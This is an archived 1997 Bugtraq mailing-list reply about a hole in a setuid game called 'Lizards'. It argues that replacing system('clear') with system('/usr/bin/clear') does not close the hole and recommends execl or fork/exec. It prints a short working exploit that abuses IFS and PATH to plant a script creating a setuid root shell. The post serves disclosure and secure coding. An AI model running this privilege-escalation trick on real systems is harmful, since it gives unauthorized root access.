[5647] in bugtraq
Re: Vunerability in Lizards game
daemon@ATHENA.MIT.EDU (Joe Zbiciak)
Tue Nov 18 15:07:55 1997
Date: Tue, 18 Nov 1997 13:02:01 -0600
Reply-To: j-zbiciak1@ti.com
From: Joe Zbiciak <j-zbiciak1@TI.COM>
X-To: levine@yoyo.org
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19971117193031.58272@yoyo.org> from "Neil Levine" at Nov 17,
97 07:30:31 pm
John Dow said previously:
| - but then again, my system("clear") wasn't particularly
| elegant either. How about system("/usr/bin/clear")?
That won't work. An attack along these lines will slice through
that "fix" pretty quickly, if I'm not mistaken.
export IFS=/
export PATH=.:$PATH
echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr
chmod 755 ./usr
lizards
:-)
"system()" is just not cut out for security.
*slightly* better would be to exec /usr/bin/clear directly with
a fork/exec. Or, if your exiting the game completely at that point
(eg. you have nothing left to do at that point), just do an
execl("/usr/bin/clear","clear",0);
and be done with it.
Regards,
--Joe
--
+------------ Joseph Zbiciak -----------+
|- - - - - j-zbiciak1@ti.com - - - - -| You have the capacity to
| - http://www.primenet.com/~im14u2c/ - | learn from mistakes.
|- - - -Texas Instruments, Dallas- - - -| You will learn alot today.
+------#include <std_disclaimer.h>------+
